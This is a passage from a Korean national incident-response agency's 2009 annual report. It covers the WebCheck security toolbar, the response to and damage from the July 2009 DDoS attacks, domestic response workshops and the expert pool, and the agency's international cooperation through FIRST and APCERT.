( 그림 3-44) 웹체크사이트정보상세보기화면 4. 주요기능 가. 악성코드은닉페이지차단및알림기능 웹체크이용자가악성코드가은닉되어있는웹사이트에접속을시도할 경우웹체크는해당웹사이트접속을차단함과동시에안내메시지창을 통해웹사이트가악성코드를은닉하고있음을알려주고접속을계속 진행할것인지묻게된다. 이경우가급적웹사이트방문을자제해야 하며꼭방문해야하는웹사이트라면, 바이러스백신이나윈도우보안패치 등보안조치를갖추거나, 가상머신또는 Sandboxie 같은웹브라우징 - 122 -

보안프로그램을통해웹사이트를이용하는것이안전하다. 웹체크가 알려주는악성코드은닉사이트정보는대응센터의악성코드탐지도구 (MC-Finder) 의탐지정보에기반을두고있다. ( 그림 3-45) 웹체크악성코드은닉사이트방문시차단및알림화면 나. 피싱사이트차단및알림기능 웹체크이용자가피싱사이트에접속을시도할경우, 웹체크는해당웹사이트접속을차단함과동시에안내메시지창을통해웹사이트가피싱사이트임을알려주고접속을계속진행할것인지묻게된다. 피싱사이트이용으로인한금전적인피해등이발생할수있으므로웹사이트이용을자제하도록하고, 반드시이용해야하는사이트라면각종개인정보입력이나온라인금융결재등은하지는말아야하겠다. 피싱사이트정보는금융보안연구원에서제공하는금융권피싱사이트정보에기반을두고있다. - 123 -

( 그림 3-46) 웹체크피싱사이트방문시차단및알림화면 다. 보안공지 / 보안뉴스제공 웹체크는대응센터에서제공하는보안공지사항과주요언론사에서 제공하는사이버보안관련뉴스를실시간으로제공하고있다. 특히보안 공지사항은기업서버또는인터넷이용자 PC에피해를줄수있는심각한 악성코드출현이나프로그램취약점정보등이발견되었을경우취약점 정보및대처법등을안내하는것으로, 지난 77 DDoS와 침해사고발생시 하게되었다. 같은대규모 본기능을통해신속한대국민안내및대처가가능 - 124 -

( 그림 3-47) 웹체크보안공지사항제공화면 라. 해킹신고 118 / PC원격점검신청 웹체크의부가기능으로써 해킹신고 118 기능과 PC원격점검신청 기능이있다. 해킹신고 118 기능은인터넷이용자가해킹/ 바이러스/ 스팸등의 피해를신고할수있는기관웹사이트로안내하는기능으로써신고한 내용에대하여전문상담원의지원및안내를받을수있다. PC 원격점검신청 기능은해킹/ 바이러스피해로 PC가손상되어 전문가의지원이필요할경우진흥원의전문요원이원격으로점검해주는 서비스를신청하는기능이다. 해킹신고 118 과 PC원격점검은신규서비 스가아니라기존에도진흥원에서제공하고있는서비스로써, 웹체크를 통해에서부가기능버튼으로제공하여서비스에대한이용자의접근성과 편리성을강화시킨기능이다. 마. 온라인쇼핑몰정보 웹체크이용자가온라인쇼핑몰사이트에접속하면웹체크화면에쇼핑카트모양의작은아이콘이생긴다. 이아이콘을클릭하면서울시전자상거래센터홈페이지로연결되어해당쇼핑몰에대한세부정보 - 125 -

( 사업자정보, 청약철회여부, 결제안전장치도입여부등) 를확인할수 있어인터넷이용자가안심하고전자상거래를이용하는데참고자료가 될수있다. ( 그림 3-48) 쇼핑몰사이트접속시화면 ( 그림 3-49) 쇼핑몰세부정보확인화면 4. 기대효과및향후서비스계획 2010년 1월정식보급을통해이용자들의악성코드감염방지및 피싱사이트피해예방은물론정보보안에대한인식제고효과가기대된다. 향후 Windows 7등신규운영체제지원확대및이용자불편사항등 프로그램을고도화개선하여서비스를제공할계획이다. - 126 -

제 9 절 7.7 DDoS 침해사고대응 1. 사건의전말 7.7 DDoS 침해사고는 7월 4일미국의주요사이트에대한일시적인공격을 시작으로 2009년 7월 7일부터 7월 10 일까지국내 외의주요웹사이트를 대상으로본격적인 DDoS 공격이동시다발적으로이루어져홈페이지 접속장애가발생한사건으로 7월 7일부터크게 3 차에걸쳐발생했다. 7월 7일이전에이미미국의 20여개정부기관과공공기관및포털사이트 등이 DDoS 공격을받았다. 이때상당수의좀비 PC가한국 IP이었기 때문에공격을당한대부분의사이트에서한국 방식으로대응했다. IP를전체차단하는 2009년7월7일18시부터시작된7.7 DDoS 공격은그대상이우리나라 정부기관과금융권과포털사이트였다. 진흥원대응센터는 7월 7일 18시 44분에 DDoS 대응시스템을통해청와대, 국회등의주요홈페이지가 DDoS 공격을받고있음을최초로인지하고해당사실을즉시국가사이버 안전센터등관련기관에통보하고, 좀비PC를섭외하여악성코드를 채취 분석하는한편, ISP등과비상대응체계를가동하는등긴급대응에 나섰다. 이공격으로인해청와대, 국방부등의12개와미국14개사이트에 접속장애가발생되었다. 방통위와진흥원은비상대응체제를구축하고 즉각적으로대응하였다. 7월 8일 18시에있었던 2차공격은 1차공격대상에대해공격이지속 되었고백신업체가공격대상에추가되었다.7월9일 18부터 3차공격이 있었으나이미많은사이트가도메인주소를변경하거나 DDoS 대응 장비업그레이드등으로대비를하여접속장애가거의발생하지않았다. 3차공격이진행되는와중에 7월10일 0시부터악성코드에감염된 PC의 - 127 -

문서파일이파괴되거나부팅에러를일으켜전국적인이용자피해가 발생하였다. 이번 7.7 DDoS 침해사고는지능적이고치밀하게계획된공격으로 서버에는접속장애를초래하였으며, 치료되지않은일부좀비 PC는 주요문서와부팅시스템이손상되었다. 지금까지는 DDoS 공격이협박을 통한금전적이득을목적으로하는개별사이트공격이주로이뤄진반면, 이번공격은특정하게밝혀진요구사항이나목적이없이동시다발적으로 국내주요기업및기관의서비스를대상하였고일반국민의 악용되었기때문에그파장이매우컸었다. PC가공격에 ( 그림 3-50) 7.7 DDoS 공격개요 2. 대응현황요약 7.7 DDoS 공격및접속장애를최초로인지한진흥원대응센터는 방통위및국가사이버안전센터등에통보를하였다. 이후정부, 진흥원, ISP/IDC, 통신사업자와백신/ 보안업체등은긴밀한공조체계를유지 하면서대응하였다. - 128 -

방통위는네트워크정책국장을반장으로한비상대응반을즉각적으로 구성운영하는등의비상대응체계를구축하여적극적으로대응하였다. 정부는국무총리실장주재, 대통령실국정기획수석주재, 국무총리주재, 국정원장주재회의등을개최하여범정부차원에서사이버위기에공조 대응하였다. 방통위는 DDoS 피해확산방지를위해언론브리핑등을 통해관련보도자료를배포하고지상파 3사와 YTN에긴급자막방송을 실시하였고이동통신 3 사와협력하여관련문자전송을하였다. 그리고 방통위원장주재로 ISP 등의 CEO와의긴급회의를진행하여 ISP들이 악성코드유포사이트를차단하도록협조를요청하였다. 진흥원은 7월 8일 02:00 에인터넷침해사고 주의 경보를발령하고 대응센터의평시모니터링체제를비상체제로전환하면서주간 6 명, 야간 4 명이 24시간상황실근무및 45 명의직원이철야로비상대기하였다. 또한보호나라등홈페이지에관련사항을공지, 게시하였으며악성코드 숙주( 총 449 개) 와유포사이트( 총 89 개) 를차단하였다. 또한공격대상 사이트에보안장비에대한임시설정방법등을제공하여대응을지원 하였고백신업체에 DDoS 전용백신개발을의뢰하여 115,044대의좀비 PC에대한신속한치료를유도하였다. 국내주요 ISP와포털사이트에 국내공격트래픽에대한모니터링강화를요청하는한편, 홈페이지를통해보안경고문을공지하였다. 포털사이트 좀비 PC에대한문서파일등의피해가발생한 7월 10일 0시이후부터 는 118 을통해조치방안을안내하는한편, DDoS 관련좀비PC 하드디스 크손상주의에대한보안공지문을게시하고이동통신 3사를통하여 DDoS 관련좀비PC 하드디스크손상주의에대한정보보호알림이서비 스를하였다. 이후하드디스크손상악성코드다운로드관련 IP의차 단을위한상황전파문을발송하였고, 더불어악성코드제거를위하여좀 비 PC 에대한조치요청을지속적으로진행하였다. 방통위는긴급히전 문가들과의회의를진행하여 PC 복구방안을마련하였다. 회의를통해 - 129 -

KT IT 서포터스가복구지원활동을지원하기로확정하고손상된시스템 의복구및악성코드제거를지원하였다. ( 그림 3-51) 7.7 DDoS 침해사고대응내역 3. 피해및복구현황 이번 7.7 DDoS 침해사고는 7월 7일 18시부터 7월 10일 18시까지총 3 차례에걸쳐일어난공격으로국내 외주요사이트에접속장애가발생 하였다. 아울러 2009년 7월 10일 0시를기준으로악성코드에감염된 PC의 파일이파괴되고부팅에러를일으키는추가적인이용자피해가발생하 였다. 가. 사이트피해 3차에걸친 DDoS 공격으로국내 22개사이트와미국 14개사이트가 피해를입었다. - 130 -

o1 차공격피해: 국내12개및미국14개사이트에접속장애발생 국내 12개사이트중 8개는 7. 8 ( 수) 13:00 정상복구, 이후 4개는 18:00 복구완료 o 2 차공격피해 : 국내 15개및미국 1개사이트에접속장애발생 국내 15개사이트중 NCSC를제외한 14개는 7.9( 목) 03:00부터정상 접속가능 o3 차공격피해: 국내7개사이트에접속장애발생 국내 7개사이트중 2 개사이트에서만잠시접속장애가있었을뿐, 대 부분원활 [ 표 3-15] 국내피해사이트현황 구분 피해사이트 국가/ 공공기관금융기관언론사민간업체 소계 1 차 청와대, 국회 국방부, 외교 통상부 한나라당 농협신한은행외환은행 조선일보 옥션 네이버( 메일) 네이버( 블로그) 12 2 차 청와대, 국방부 국가사이버 안전센터 전자민원 G4C 기업은행하나은행우리은행국민은행 조선일보 옥션, 네이버 ( 메일) 다음( 메일) 파란( 메일) 알툴즈 안철수연구소 15 3 차 전자민원 G4C 국민은행조선일보옥션 네이버( 메일) 다음( 메일) 파란( 메일) 7-131 -

공격대상 1차 2차 3차 기관명 공격대상사이트 O O 청와대 www.president.go.kr O O 국방부 www.mnd.mil.kr O O O 옥션 www.auction.co.kr O O O 조선일보 www.chosun.com O O O 네이버( 메일) mail.naver.com O 국가사이버안전센터 www.ncsc.go.kr O O 전자민원G4C www.egov.go.kr O O 다음( 메일) mail.daum.net O O 파란( 메일) 국 mail.paran.com 내 O 기업은행 www.ibk.co.kr O 하나은행개 www.hanabank.com O 우리은행 www.wooribank.com 사 O O 국민은행이 www.kbstar.com O 알툴즈트 www.altools.co.kr O 안철수연구소 home.ahnlab.com O 외교통상부 www.mofat.go.kr O 국회 www.assembly.go.kr O 한나라당 www.hannara.or.kr O 네이버( 블로그) blog.naver.com O 농협 banking.nonghyup.com O 신한은행 banking.shinhan.com O 외환은행 www.keb.co.kr O O 한미연합군사령부 www.usfk.mil O 백악관( 미국) www.whitehouse.gov O Federal Aviation Administration www.faa.gov O Department of Homeland Security www.dhs.gov O U.S. Department of State www.state.gov O VOA(Voice of America) 미 www.voanews.com O U.S. Department of Defense 국 Official Website www.defenselink.mil O United States - Department of 개 The Treasury 사 www.ustreas.gov O Yahoo(Business Finance, Stock Market) 트이 finance.yahoo.com O New York Stock Exchange www.nyse.com O NASDAQ Stock Market www.nasdaq.com O U.S. Bank www.usbank.com O Washington Post www.washingtonpost.com O U.S. auctions Live www.usauctionslive.com 26개 16개 7개 [ 표 3-16] DDoS 공격대상사이트현황 (22 ) (14 ) - 132 -

나.PC 손상피해 대응센터와백신사업자를통해접수된악성코드감염 PC 수는총 1,466 대였다. [ 표 3-17] PC손상악성코드대응현황 (7.15 15:00 종료) 신고접수기관 대응센터 손상대수 1,306대 침해사고대응조치 - 홈페이지(KrCERT, 보호나라) 팝업공지를통한예방및조치안내 - 진흥원 '118' 전화상담을통한대응방법안내 신고자대상현장복구지원서비스(KT IT 서포터즈) 연계 - 대국민언론보도를통한홍보안내 - 주요 HDD 복구전문업체가복구에참고할수있는기술자료제공 백신사업자 160 대 - 홈페이지를통해전용기능프로그램제공( 악성코드실시간차단및 손상방지프로그램 ) PC 손상관련피해접수는대응센터및백신사업자를통해진행 ( 그림 3-52) 시간대별피해신고접수상황 - 133 -

다. 사회경제적 피해 이번 7.7 DDoS 침해사고때중요자료유출등의피해는신고되지않 았으나, 국가및피해기관은신뢰도에커다란손실을입은것으로파악 된다. 특히피해현황은각기관별분석기준에따라다소차이는있으나 최소수백억원대의경제적피해를입은것으로추산하고있다. 현대경제연구원에의하면최소 363억원에서최대 544 억원으로추정된다. 최대피해액인 544억원은행안부에서발표한 2008년풍수해피해액인 580 억원에거의근접한수치여서피해정도는심각하다고할수있다. - 134 -

제 4 장국내 외침해사고대응협력체계구축 제 1 절국내침해사고대응협력강화 1. 배경 2003년 12월대응센터개소(2003. 12.) 와더불어주요정보통신서비스제공 사업자(ISP, IDC, 이동통신, MSO 등기간통신사업자) 및보안관련업체 / 유관기관등과범국가적침해사고예방및피해최소화를위한상호간의 긴밀한협력체계를유지하기위하여다음과같은내용을기반으로반기 별로국내침해사고대응협력강화워크샵을개최해오고있으며, 침해사고 대응협력워크샵의목적과주요내용은아래와같다. o 평시비상시 침해사고의공동대응을위하여정보보호주요현안에 정보공유및상호협력사항에관한의견교환 o 비상시긴급대응을위한협력체계확인및점검 대한 o 최신보안기술및주요침해사고대응현황등에대한세미나를통한최신 보안이슈동향파악및대응기술확보 o 대응센터정보제공관련애로사항청취및요구사항수렴등 2. 추진내용 가. 제 1 차워크샵 ( 상반기) o 기간 : 2009. 6. 18( 목) ~ 19( 금) o 장소 : 외부 o 참석자: ISP, IDC, SO, 이통사, 관제업체등 23개기관 - 135 -

o 주요안건및프로그램 -MSIE8 보안이슈 Windows7 OS 에기본탑재되며, 기존OS 에서도별도설치가능 웹조각, 바로연결, MSN 사이트와연결된빠른검색찾기기능이 - 추가되어편리성향상 보안적인측면 1 SmartScreen 필터 - 피싱과악성코드감염사이트접속차단 2 3 4 5 악성스크립트의실행차단(XSS 필터) 및클릭재킹방지 피싱사이트접속방지를위해도메인이름이자동강조 SSL 접속및 표시줄이녹색줄로변경됨 DEP - VeriSign에서확인된사이트접속의경우주소 실행메모리영역이아닌지역에서어플리케이션이나 서비스가실행되는것을방지 6 InPrivate 브라우징 - 창이닫힐때자동으로캐시가삭제되며, 암호, 검색어, 주소표시줄에넣은 URL은저장하지않음 7 InPrivate 필터링 - 제3자콘텐츠가포함된사이트를열때 차단할것인지여부를콘텐츠제공자에따라사용자가결정함 클라우드컴퓨팅동향및보안이슈 클라우드컴퓨팅이란고객이어플리케이션을사용하고자할때언제 어디서든지사용이가능한고가용성환경제공및인프라의무한 확장성, 사용한만큼의비용을지불하는컴퓨팅방식임 이런클라우드컴퓨팅을제공하기위해고려할수있는사항으로는 사용자확인방법( 접근권한), 인프라의무한확장에따른네트워크 구성의안정성이고려되어야하며, UI, 프로세스, 데이터별로 하나로통합되어유기적으로조화되어야함 - 개인정보의기술적 관리적보호조치기준안 최근개인정보의기술적 관리적보호조치기준법안의주요 내용은, 1 해킹공격에대한개인정보처리시스템의안전성강화를위해 - 136 -

접근통제규칙및방법상세화 2 해킹또는유출등침해사고발생징후를예측하고, 3 -IPTV 하는데필요한관리 감독강화 해킹을통해유출된주민등록번호, 대응 계좌번호등금융정보의 불법사용을방지하기위해개인정보의암호화강화를위함 이며, 이런기준에대해 09년도의정부정책추진방향으로는 사전예방체계강화(i-PIN 이용활성화, 개인정보법규해설서 보급등개인정보침해방지에주력), 사후대응실효성확보 ( 개인정보유ㆍ노출즉각대응시스템구축및주요웹사이트 모니터링확대), 자율관리환경조성( 사업자스스로개인정보 관리수준을점검할수있는제도도입및 응용개발및보안기술 tool 제공) 임 국내 IPTV는현재 KT, LG 데이콤, SK브로드밴드에서서비스 중이며, 최근에는공중파실시간방송도서비스중임 IPTV의응용프로그램개발언어로는 C/C++, java Xlet, HTML, Flash 가있으며, 현재많은응용프로그램들이 java Xlet 또는 HTML 을사용하고있음 IPTV의컨텐츠를보호하기위해사용되고있는기술은 CAS, - DRM 의방식이가장많이사용되고있음 1 CAS - 스크램블기술을이용, 과거에는방송망( 단방향) 의 방송채널보호에주로사용되었으나, 현재는인터넷망의 VOD 컨텐츠보호영역으로진화됨( 기존시설비절약) 2 DRM - 암호화기술을이용, 인터넷망의 VOD 컨텐츠에주로 사용됨, 무선컨텐츠보호에도사용됨(Wibro) 웹공격동향및대응 최근국내웹서버의침해사고이용용도를확인결과, 대부분국외 유명금융사이트또는쇼핑몰의피싱경유지이용되었으며, 봇넷을 구축하기위한악성코드유포지로악용되고있음이확인됨 전세계적으로웹서버가해킹당하는주요이유는악의적인사용자가 - 137 -

입력한값에대해웹서버의어플리케이션에서(ASP, PHP, JSP 등) 적절히검증하지않기때문이며, 관리자의사소한실수및설정값으로인한발생이확인됨 나. 제 2 차워크샵 ( 하반기) o 기간 : 2008. 12. 10( 목) ~ 11( 금) o 장소 : 외부 o 참석자: ISP, IDC, SO, 이통사, MS, 포탈사이트등 25개기관 o 주요안건및프로그램 -7.7DDoS 공격의알려지지않은비밀및시연 7.7 DDoS 공격시연 : 웹하드해킹, 업데이트파일변경 피해자 악성코드감염 7.7 DDoS 공격 피해자감염PC의하드디스크 파괴 추가 DDoS 공격발생가능성 - 역발상을통한대응방안 : 봇넷역공격을통해좀비PC의악성코드를 - 치료하는대응방안소개 해킹예방및신속한대응을위해사이버보안컨트롤타워마련 ( 범정부적인대응체계마련), 악성프로그램확산방지등에관한 법률제정,CEO 의관심고취및적극적인예산투자, 개인 PC보안 체계강화( 보안업데이트, 백신) 등의필요성강조 -7.7DDoS 최근 이후통신사업자의대응전략변화 DDoS 침해공격의명령/ 제어프로토콜의진화 중앙집중형(IRC, HTTP) 방식 분산형(P2P) 명령/ 제어방식으로 발전하였으며, 중앙집중형방식에있어서, IRC 방식 탐지가 어려운 최근 DDoS HTTP 방식으로전환 공격특징 1 DDoS 트래픽의급속한증가 (08년말최대 58G 발생, 국내일본 ) 주요원인 : 고객PC 의高사양화, 좀비PC( 악성코드감염PC) 의 증가, 대역폭(FTTH) 증가등 - 138 -

2 공격대상은사회적이슈가되는정부및금융기관등으로다양화 3 공격근원지( 좀비PC 수) 는한국이세계 3위 ISP와정부의DDoS 대응을위한공조필요성강조 - 웹체크보안툴바소개 웹체크보안툴바는이용자가방문하는웹사이트의악성코드은닉 여부, 실시간긴급보안공지, PC 원격점검, 해킹신고등대응 센터의서비스를통합제공할수있는인터넷브라우져탑재형 통합에이젼트프로그램 (ToolBar 프로그램) 툴바(ToolBar) : 이용자 PC의웹브라우저내에부가적으로설치되어 각종편이기능을제공하는프로그램 아키텍처(3Tier, Client/Server 구조) 1 2 클라언트계층 : 웹체크홈페이지, 웹체크클라이언트 서버계층 : 웹체크서버( 응답서버, DB 서버등) 3 데이터베이스계층 :AltibaseDB 사용(SSL 인증서적용, 악성코드 피싱, 국가별IP 정보, 보안공지/ 경고등) 웹체크보안툴바를통해대국민보안인식제고에기여하며, 일반 인터넷이용자의악성코드감염, 피싱등침해사고피해예방하고, 신규악성코드경유지탐지및조치등에활용예정이며, 및고객에게적극홍보를당부함 사내 향후일정 : 연말포털을통한광고및보급이벤트진행, 서비스 안정화및고도화추진 ( 10) - 휘슬 2.0 소개 웹서버관리자가사용할수있는웹쉘자동탐지프로그램필요에 따라웹쉘을대응센터에서개발함 주요기능으로는웹서버에숨겨진웹쉘을탐지하여, 관리자에게 통지, 최신 ASP, PHP, JSP 웹쉘탐지로안전한웹서버환경제공, 주기적으로최신웹쉘패턴업데이트제공, 웹쉘탐지를저해하는 인코딩웹쉘탐지기능제공, 검역소를제공하여의심스러운 파일은서비스로부터격리, 윈도우계열및리눅스유명배포판 - 139 -

버전지원등의주요기능이있음 웹보안수준을높이기위해끊임없는소스코드점검수행, 항상 공격에대비하는자세, 웹로그, 로그인계정등지속적인점검등이 필요하며, 웹서버침해사고대응을위해지속적인점검을통한웹쉘제거, 업로드이전에첨부파일확장자점검및차단등의조치가필요함 - 140 -

제 2 절민관 합동조사단전문가풀운영 1. 추진배경 정보통신서비스제공자의정보통신망에중대한침해사고가발생한때에 피해확산방지 사고대응 복구및재발방지대책을마련하고자 정보통신망 이용촉진및정보보호등에관한법률 제48조의4에의거민 관합동 조사단전문가풀을구성하고있다. 민관합동조사단 운영지침 제2장제5 조( 전문가자격) 에의거전문가 풀에속한전문가의자격이 2년간유효하여 2년주기로전문가풀을 재구성하고있으며, 평시에는민 관합동조사단전문가간의정보공유 및상호의견교류강화를위하여세미나및워크숍을개최하고있다. 2. 관련근거 o 정보통신망이용촉진및정보보호등에관한법률 제48조의4( 침해사고원인분석등)2방송통신위원회는정보통신서비스제공자의 정보통신망에중대한침해사고가발생한때에는피해확산방지 사고대응 복구 및재발방지를위하여정보보호에전문성을갖춘민 관합동조사단을구성하여 당해침해사고의원인분석을할수있다.< 개정 2008.2.29> o 정보통신망이용촉진및정보보호등에관한법률시행령 제59 조( 민 관합동조사단의구성등) 1 방송통신위원회가법제48조의4 제2항에 따라민 관합동조사단( 이하 " 조사단" 이라한다) 을구성할때에는다음각호의 자로조사단을구성하여야한다. 2 1. 2. 3. 4. 침해사고를담당하는공무원 침해사고에관한전문지식과경험이있는자 보호진흥원의직원 그밖에침해사고의원인분석에필요하다고인정되는자 제항에따른조사단의구성은침해사고의규모및유형에따라조정할수있다 1. - 141 -

3. 주요운영현황 정보보호전문가로구성된전문가풀은평시에는세미나, 워크숍등을 통해지속적인관리및침해사고대응능력을강화하고있으며, 금년에는 전문가들이희망하는 6 개분야의실무분과('DDoS & Botnet', 'IPTV & VoIP', ' 가상화/ 클라우드컴퓨팅환경에서의보안대책' 등) 를구성하여 분과별주요이슈및대응방법등에대하여심도있는논의가이루어지는 등전문가역량강화및활발한정보교류를위해노력하였다. 현재민관합동조사단 전문가풀은다음과같이총 85명으로구성되어있다. [ 표 4-1] 민관합동조사단 전문가풀현황 분야별세부분야인원 보안기술분야네트워크, 운영체제, 응용서비스, 보안솔루션, 분석전문등 72 보안관리분야보안정책, 법률, 개인정보보호전문가등 12 물리적보안분야항온항습, 도난방지, 출입통제등 1 총 85명 가. 민관합동조사단 전문가풀간담회개최 민관합동조사단 전문가들의침해사고예방및대응활동을위한 효율적인운영방안을도출하고, 대응센터및전문가구성원간정보교류활성화 방안에대하여논의하고자 2월 24 일( 화) 에진흥원에서간담회를개최하 였다. 본간담회를통해평시에해당전문가들의침해사고예방및대응활동을 활성화하기위한운영위원회가 10 인으로구성되었으며, 분야별전문가들과 함께다양한관점에서피해상황및대응책에대하여심도있게논의하기 위한실무분과구성이필요하다는의견등이제기되었다. - 142 -

나. 민관합동조사단 전문가풀운영위원회 금년에는총 4 회운영위원회회의를개최한바있으며, 분야별전문가간 정보교류활성화를위하여실무분과구성및세미나개최방법수립등에 대한논의가중심을이루었다. 또한민관합동조사단 전문가와방송통신 위원회, 진흥원이함께하는워크숍을계획하는등전문가풀활성화를위 하여노력하였다. 다. 민관합동조사단 전문가풀워크숍 방송통신위원회와진흥원주요담당자와함께한이번워크숍은 8월 21일 ( 금에 ) 민관합동조사단 전문가 31명을포함한총 50여명이 운데개최되었다. 참석한가 금번워크숍에서는 7월 23일새롭게출범한진흥원소개와최근발생한 7.7 DDoS 공격 에대한대응종합보고시간을마련하여전문가들과현안 사항에대하여공유하고, 전문가풀내특화된 6개실무분과별로소속 전문가간최근정보보호이슈및대응방안에대하여토의를함으로써 정보교류활성화를도모하는데목적을두었다. 특히, 금년최대이슈인 7.7 DDoS 침해사고대응경과보고및 7.7 DDoS 관련악성코드분석등에대한발표및토의로전문가들의높은 호응을얻었으며, 대응센터와전문가간협업을위하여보다활발한정보 교류가절실히필요하며, 침해사고발생시민 관합동조사단전문가역할이 중요함을강조하였다. 라. 민관합동조사단 전문가풀실무분과구성및세미나 최근주요인터넷침해사고이슈를고려하여전문가풀내특화된 6개 - 143 -

실무분과를아래와같이구성하였다. [ 표 4-2] 인터넷침해사고실무분과구성 순번 분과명 분과위원장 ( 간사) 1 가상화/ 클라우드컴퓨팅환경에서의보안대책김홍석부장 2 DDoS & BOTNET 3 취약점분석및악성코드분석대응분석전문 4 IPTV & VoIP 구자현과장 ( 유영록대리) 최원혁차장 ( 최재혁팀장) 이상엽팀장 ( 김태훈과장) 5 모바일보안홍관희매니져 6 정보보호정책분과( 법률, 관리등) 유우영팀장 ( 박나룡차장) 실무분과는전문가의자발적인참여로분과위원장및간사각 1인씩을 두어세미나프로그램구성및발표자섭외등전문가중심으로운영되고 있으며, 진흥원에서실무를담당하고있는연구원들이함께참여하여효과를 극대화하였다. 또한, 필요시최신의프로젝트를수행하고있는대학정보 보호동아리또는전문분야강사를초청하여특강을하는등활발한정보 교류가이루어졌다. 다음은실무분과주요활동현황이다. (1) 1 차실무분과세미나 o 분과명: 정보보호정책분과 o 일시 : 2009. 6. 24( 수), 16:00~19:00 o 참석자: 전문가및KISA 연구원등총11명 o 주요내용 : 정보보호정책분과운영안건수렴및향후계획논의 - 144 -

(2) 2 차실무분과세미나 o 분과명 : DDoS & Botnet 분과 o 일시 : 2009. 9. 14( 월), 16:00~20:00 o 참석자: 전문가및KISA 연구원등총22명 o 주요내용 -Botnet -P2PBotnet 회피기법분석 탐지 - 블랙에너지를이용한 DDoS공격등 (3) 3 차실무분과세미나 o 분과명 : IPTV & VoIP 분과 o 일시 : 2009. 10. 27( 수), 18:00~20:00 o 참석자: 전문가및KISA 연구원등총13명 o 주요내용 - 최근 IPTV & VoIP 관련 KISA 업무/ 이슈 -IPTV,VoIP 보안이슈및대응사례 -IPTV,VoIP 보안이슈/ 기술브레인스토밍 -IPTV&VoIP 향후분과발전방향토론 (4) 4 차실무분과세미나 o 분과명 : DDoS & Botnet 분과 o 일시 : 2009. 11. 11( 수) 17:00 19:00 o 참석자: 전문가및KISA 연구원등총14명 o 주요내용 -PDoS 의이해 - 스팸 Botnet 및프리서버 DDoS 대응방안등 (5) 5 차실무분과세미나 o 분과명 : IPTV & VoIP 분과 o 일시 : 2009. 12. 3( 화) 15:00 20:00-145 -

o 참석자: 전문가및KISA 연구원등총10명 o 주요내용 -IPTV -FMC 보안이슈및 RISK 기술및보안이슈 분석 - 디지털컨텐츠보호기술과 DCAS 등 (6) 6 차실무분과세미나 o 분과명: 취약점및악성코드분과 o 일시 : 2009. 12. 9( 목), 15:00~19:00 o 참석자: 전문가및KISA 연구원등총16명 o 주요내용 - - 포털서비스를향한악성코드의위협 디지털홈환경에서의보안취약점등 마. 전문가풀전용메일링리스트운영 전문가간상시신속한정보공유체계를마련하고, 침해사고에대한주요이슈발생시정보공유및주요현안사항을논의하기위하여전문가풀전용메일링리스트(joint@krcert.or.kr) 를운영하여실시간정보를공유하고있다. 4. 향후운영계획 금년에는분야별특화된실무분과를구성하여전문가간정보교류를 강화하고, 주요침해사고이슈에대하여심도있는발표와토론을통해 실질적인대안이도출될수있도록유도했다는점에서전문가풀운영이 활성화되고있다는평가를받았으며, 이를계기로향후 2010년에는그동안 논의된주제및전문가의노하우를일반인에게알릴수있는자리를 마련하고자한다. - 146 -

또한 2010년 9월말 3 기민 관합동조사단전문가풀임기가만료됨에 따라최신주요이슈를반영하여세부분야를선정하고, 적극적인홍보 활동을통해국내최고정보보호전문가풀을구성하고자하며, 침해사고의 선제적예방활동및정보통신망의중대한침해사고발생시보다신속하게 대응할수있도록전문가의사고대응능력강화를위해체계적인계획을 수립하고운영할것이다. - 147 -

제 3 절국제침해사고대응협력활동 1. FIRST 1988 년인터넷웜이등장함에따라이에대응하고자미국정부는 CERT Coordination Center 를설립하였고, 이후CIAC(Computer Incident Advisory Capability) 이라는침해사고대응조직을결성하였다. 1989년 Wank 웜이라는이름의악성코드가대규모로전파되는침해사고가 발생함에따라침해사고대응팀간원활한소통및조정기능의필요성이 부각되어 1990년 FIRST(Forum of Incident Response and Security Teams, 국제침해사고대응팀협의회) 가조직되었고, 각국의주요침해사고 대응팀들이회원으로참여하여침해사고대응이라는공동의과제를 바탕으로진화하였다. FIRST 는미주, 유럽, 아 태지역및아프리카등 전세계에걸쳐 200여개의침해사고대응팀을회원으로가진비영리국제 기구로성장하였다. 2009년말현재 47개국의 205개기관이가입되어 있으며, 대학, 정부기관, 대규모네트워크보유기업등의침해사고대응팀 들과정보시스템개발업체, 사법기관그리고정보보호전문가들등 광범위한분야의기관들로구성되어있다. FIRST 의조직구성은의장, 부의장, 운영위원회(Steering Committee), 사무국(Secretariat), 협력회원(Liaisons), 교육분야등다수의위원회및 재정과법률자문을담당하는법인체로서의 FIRST.org, Inc. 가있으며, 매년 연례컨퍼런스및총회, 기술세미나(TC : Technical Colloquia), 심포지움 등을개최하고있으며, 메일링리스트(first-teams@first.org) 및 IRC서버 운영을통하여회원간정보교류및국제협력이이루어지고있다. KrCERT/CC는한국을대표하여 1996년부터 FIRST 컨퍼런스에 지속적으로참가하였으며, 1998년아시아지역에서는최초로 FIRST - 148 -

정회원으로가입하여현재까지꾸준한활동을펼쳐오고있다. 2009년말 현재우리나라에서는 KrCERT/CC 를포함한 4 개기관(KN-CERT, ASEC, INFOSEC-CERT) 이 FIRST 정회원으로참여하고있다. FIRST 정회원가입을위해서는 FIRST 정회원으로활동중인 2개기관이 후원기관이필요하며, 후원기관이가입기관에방문하여정책, 시설등이 FIRST 정회원자격요건에부합하는지를확인하기위한현장실사를실시한다. 회원자격 위원회와운영위원회의논의를거쳐가입이승인된다. 2008년도또한 KrCERT/CC 는 6월 13일부터 18일까지일본교토에서개최된 FIRST 연례총회와연례컨퍼런스에참석하여운영위원선거참여등의정회원활동을하였다. 2. APCERT APCERT(Asia Pacific Computer Emergency Response Team, 아태 침해사고대응팀협의회) 는아시아 태평양지역내침해사고대응팀상호간의 협력을장려및지원하기위한목적으로설립되었다. 회원가입자격과 관련하여아시아태평양지역을 APNIC( 아 태네트워크정보센터) 에서 정의한경도 60 도로제한하고있다. APCERT 는 2009 년말현재 16개국 23개 CERT( 정회원 : 17 개팀, 일반회원 : 6 개팀) 로구성되어있다. 2006년 3 월에연례총회(AGM) 에서통과된운영규칙 (Operational Framework) 에서 APCERT 운영과관련한몇가지변화가 있었다. 운영규칙은 APCERT 의모든활동을규정하는규범으로, 회원자격및 조직을중심으로살펴보도록하겠다. APCERT 회원은정회원과일반회원으로구성된다. 정회원의자격은 - 149 -

